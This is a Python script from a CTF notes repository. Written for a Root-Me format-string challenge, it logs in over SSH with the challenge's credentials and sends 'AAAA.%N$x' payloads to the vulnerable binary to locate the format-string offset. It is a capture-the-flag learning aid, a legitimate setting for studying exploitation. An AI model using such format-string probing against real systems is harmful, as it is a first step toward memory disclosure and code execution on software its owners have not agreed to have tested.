tudattr/ctf-notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5cd3b5a531f3890b31daac8fa11cb922646caac9
ctf-notes/app-system/elf-x86-format-string-bug-basic-2/scripts/find_offset.py
Tuan-Dat Tran 5cd3b5a531 feat: app system challenges 
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-23 09:19:03 +01:00

52 lines
1.4 KiB
Python
Executable File
Raw Blame History

#!/usr/bin/env python3
import base64
import re
import shlex
import paramiko
HOST = "challenge02.root-me.org"
PORT = 2222
USER = "app-systeme-ch14"
PASSWORD = "app-systeme-ch14"
BIN = "/challenge/app-systeme/ch14/ch14"
def run_payload(ssh: paramiko.SSHClient, payload: bytes, pty: bool = False) -> str:
b64 = base64.b64encode(payload).decode()
py = f"import os,base64;p=base64.b64decode('{b64}');os.execv('{BIN}',[b'ch14',p])"
cmd = "python3 -c " + shlex.quote(py)
_, stdout, _ = ssh.exec_command(cmd, get_pty=pty)
return stdout.read().decode("latin-1", "ignore")
def main() -> None:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(HOST, port=PORT, username=USER, password=PASSWORD, timeout=10)
try:
found = None
for i in range(1, 80):
payload = f"AAAA.%{i}$x".encode()
out = run_payload(ssh, payload)
m = re.search(r"fmt=\[(.*)\]", out)
if not m:
continue
fmt_out = m.group(1).lower()
if "41414141" in fmt_out:
found = i
print(f"[+] offset found: {i}")
print(f"[+] fmt output: {m.group(1)}")
break
if found is None:
print("[-] offset not found in tested range")
finally:
ssh.close()
if __name__ == "__main__":
main()
Reference in New Issue View Git Blame Copy Permalink